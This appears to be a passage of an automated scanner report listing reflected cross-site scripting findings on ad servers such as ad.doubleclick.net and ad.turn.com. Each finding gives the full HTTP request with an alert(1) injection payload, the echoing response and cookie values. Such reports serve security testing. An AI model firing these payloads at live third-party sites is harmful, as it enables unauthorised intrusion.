3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1062a'%3balert(1)//19c389f15b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1062a';alert(1)//19c389f15b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1?&1062a'%3balert(1)//19c389f15b=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 342
Date: Sat, 23 Jul 2011 04:42:56 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/d;44306;0-0;0;30748661;31-1/1;0/0/0;;~okv=;pg=viewvc;tile=1;tpc=hoytllc-vcloud;sz=1x1?&1062a';alert(1)//19c389f15b=1;bsg=109738;bsg=109741;;~sscs=%3f">
...[SNIP]...

3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9a9'%3balert(1)//049934a0fac was submitted in the pg parameter. This input was echoed as fe9a9';alert(1)//049934a0fac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=fe9a9'%3balert(1)//049934a0fac HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:53 GMT
Expires: Sat, 23 Jul 2011 04:42:53 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/k;44306;0-0;0;30748661;255-0/0;0/0/0;;~okv=;pg=fe9a9';alert(1)//049934a0fac;bsg=109738;bsg=109741;;~sscs=%3f"><
...[SNIP]...

3.30. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35290"><script>alert(1)</script>9abbec4719c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=35290"><script>alert(1)</script>9abbec4719c&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:58 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=8293284759505948787&fpid=35290"><script>alert(1)</script>9abbec4719c&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.31. http://ad.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b8d"><script>alert(1)</script>02186be73ca was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=18b8d"><script>alert(1)</script>02186be73ca HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:57 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=2626437605781778254&fpid=1&nu=n&t=&sp=18b8d"><script>alert(1)</script>02186be73ca&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b090d"><script>alert(1)</script>b3e751e2978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&b090d"><script>alert(1)</script>b3e751e2978=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$